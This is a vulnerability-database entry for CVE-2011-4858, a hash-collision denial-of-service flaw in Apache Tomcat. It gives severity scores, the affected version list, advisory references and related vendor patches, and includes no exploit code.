Lumension® Endpoint Intelligence Center

Intelligence Center » Browse All Vulnerabilities » CVE-2011-4858

Overview

Vulnerability Score 5.0 5.0
CVE Id CVE-2011-4858
Last Modified 05 Mar 2014 11:33:57
Published 05 Jan 2012 02:55:01
Confidentiality Impact NONE NONE
Integrity Impact NONE NONE
Availability Impact PARTIAL PARTIAL
Access Vector NETWORK
Access Complexity LOW
Authentication NONE

CVE-2011-4858

Summary

Apache Tomcat before 5.5.35, 6.x before 6.0.35, and 7.x before 7.0.23 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.

Vulnerable Systems

Application

  • Apache Tomcat 5.5.35

  • Apache Tomcat 6.0.0

  • Apache Tomcat 6.0.1

  • Apache Tomcat 6.0.10

  • Apache Tomcat 6.0.11

  • Apache Tomcat 6.0.12

  • Apache Tomcat 6.0.13

  • Apache Tomcat 6.0.14

  • Apache Tomcat 6.0.15

  • Apache Tomcat 6.0.16

  • Apache Tomcat 6.0.17

  • Apache Tomcat 6.0.18

  • Apache Tomcat 6.0.19

  • Apache Tomcat 6.0.2

  • Apache Tomcat 6.0.20

  • Apache Tomcat 6.0.21

  • Apache Tomcat 6.0.22

  • Apache Tomcat 6.0.23

  • Apache Tomcat 6.0.24

  • Apache Tomcat 6.0.25

  • Apache Tomcat 6.0.26

  • Apache Tomcat 6.0.27

  • Apache Tomcat 6.0.28

  • Apache Tomcat 6.0.29

  • Apache Tomcat 6.0.3

  • Apache Tomcat 6.0.30

  • Apache Tomcat 6.0.31

  • Apache Tomcat 6.0.32

  • Apache Tomcat 6.0.33

  • Apache Tomcat 6.0.34

  • Apache Tomcat 6.0.4

  • Apache Tomcat 6.0.5

  • Apache Tomcat 6.0.6

  • Apache Tomcat 6.0.7

  • Apache Tomcat 6.0.8

  • Apache Tomcat 6.0.9

  • Apache Tomcat 7.0.0

  • Apache Tomcat 7.0.1

  • Apache Tomcat 7.0.10

  • Apache Tomcat 7.0.11

  • Apache Tomcat 7.0.12

  • Apache Tomcat 7.0.13

  • Apache Tomcat 7.0.14

  • Apache Tomcat 7.0.15

  • Apache Tomcat 7.0.16

  • Apache Tomcat 7.0.17

  • Apache Tomcat 7.0.18

  • Apache Tomcat 7.0.19

  • Apache Tomcat 7.0.2

  • Apache Tomcat 7.0.20

  • Apache Tomcat 7.0.21

  • Apache Tomcat 7.0.22

  • Apache Tomcat 7.0.3

  • Apache Tomcat 7.0.4

  • Apache Tomcat 7.0.5

  • Apache Tomcat 7.0.6

  • Apache Tomcat 7.0.7

  • Apache Tomcat 7.0.8

  • Apache Tomcat 7.0.9


References

CERT-VN - VU#903934

CONFIRM - https://bugzilla.redhat.com/show_bug.cgi?id=750521

MISC - http://www.ocert.org/advisories/ocert-2011-003.html

MISC - http://www.nruns.com/_downloads/advisory28122011.pdf

CONFIRM - http://tomcat.apache.org/tomcat-7.0-doc/changelog.html

MLIST - [announce] 20111228 [SECURITY] Apache Tomcat and the hashtable collision DoS vulnerability

MISC - https://github.com/FireFart/HashCollision-DOS-POC/blob/master/HashtablePOC.py

HP - HPSBUX02741

DEBIAN - DSA-2401

SECUNIA - 48791

SECUNIA - 48790

HP - SSRT101146

HP - HPSBUX02860

SECUNIA - 55115

SECUNIA - 54971

REDHAT - RHSA-2012:0406

REDHAT - RHSA-2012:0089

REDHAT - RHSA-2012:0325

REDHAT - RHSA-2012:0078

REDHAT - RHSA-2012:0077

REDHAT - RHSA-2012:0076

REDHAT - RHSA-2012:0075

REDHAT - RHSA-2012:0074

Related Patches

Red Hat 2012:0474-03 RHSA Moderate: tomcat5 security update for RHEL 5 x86

Red Hat 2012:0474-03 RHSA Moderate: tomcat5 security update for RHEL 5 x86_64

Novell SUSE 2012:7933 tomcat5 security update for SLES 10 SP4 i586

Novell SUSE 2012:7933 tomcat5 security update for SLES 10 SP4 x86_64


Last Updated: 27 May 2016 10:58:00